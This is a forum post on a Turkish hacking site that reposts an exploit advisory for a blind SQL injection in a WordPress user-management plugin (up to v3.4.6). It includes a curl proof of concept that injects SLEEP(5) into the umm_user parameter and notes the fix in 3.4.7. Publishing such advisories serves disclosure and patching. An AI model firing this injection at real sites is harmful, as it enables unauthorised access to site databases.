WordPress User **** Manager Plugin [Blind SQLI]

siberkafa

Yeni üye
19 Tem 2012
38
0
* Exploit Başlığı: WordPress User **** Manager Plugin [Blind SQLI]
* Oluşturulma Tarihi: 2015/12/28
* Exploit Çıkış Tarihi: 2016/02/04
* Açığı olan uygulama: https://wordpress.org/plugins/user-****-manager/
* Version: 3.4.6
* Test edilen sürümü : WordPress 4.4.1
* Category: webapps

Description
================================================================================

AJAX actions `umm_edit_user_****` and `umm_delete_user_****` of the User ****
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET
param.

PoC
================================================================================


curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=[umm_delete_user_****|umm_edit_user_****]&umm_user=SLEEP(5)"

version 3.4.7
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.